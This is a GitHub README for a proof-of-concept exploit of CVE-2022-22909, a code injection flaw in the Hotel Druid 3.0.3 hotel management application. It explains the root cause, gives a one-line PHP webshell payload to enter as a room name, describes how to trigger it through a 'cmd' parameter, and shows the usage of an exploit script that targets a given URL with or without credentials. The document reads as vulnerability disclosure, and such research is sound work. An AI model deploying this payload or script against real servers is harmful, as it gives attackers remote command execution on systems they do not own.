# CVE-2022-22909
## Description
A Code Injection vulnerability has been found on the `Hotel Druid v3.0.3` application, which an attacker could exploit to execute remote code on the server.
**For a successful exploitation, an attacker should have the privilege to add a new room.**

## Vulnerability description
The vulnerability occurs because room names are getting stored inside a file named `/dati/selectappartamenti.php` using **Double Quotes**.

```php
<?php 
echo "
<option value=\"Room1\">Room1</option>
<option value=\"Room2\">Room2</option>
<option value=\"Room3\">Room3</option>
";
?>

```

## Payload
To perform a successful exploitation, add a room with the following payload as room name.

```php
{${system($_REQUEST[cmd])}}
```

After adding a new room, go to `/dati/selectappartamenti.php` and trigger the webshell by passing a command using the `cmd` parameter.

## Usage
```
usage: hotel-druid.py [-h] -t TARGET [-u USERNAME] [-p PASSWORD] [--noauth]

optional arguments:
  -h, --help            show this help message and exit

required arguments:
  -t TARGET, --target TARGET
                        Target URL. Example : http://10.20.30.40/path/to/hoteldruid
  -u USERNAME, --username USERNAME
                        Username
  -p PASSWORD, --password PASSWORD
                        password
  --noauth              If No authentication is required to access the dashboard
```

## Example
If the application has no authentication.
Use the `--noauth` flag to perform no authentication.

![](https://github.com/0z09e/CVE-2022-22909/raw/main/img/Pasted%20image%2020220217230935.png)

If the server has authentication enabled, use the `--username` and `--password` to perform authentication.

![](https://github.com/0z09e/CVE-2022-22909/blob/main/img/Pasted%20image%2020220217231404.png)

## Credits
Researcher and POC writer - [0z09e](http://twitter.com/0z09e)
***
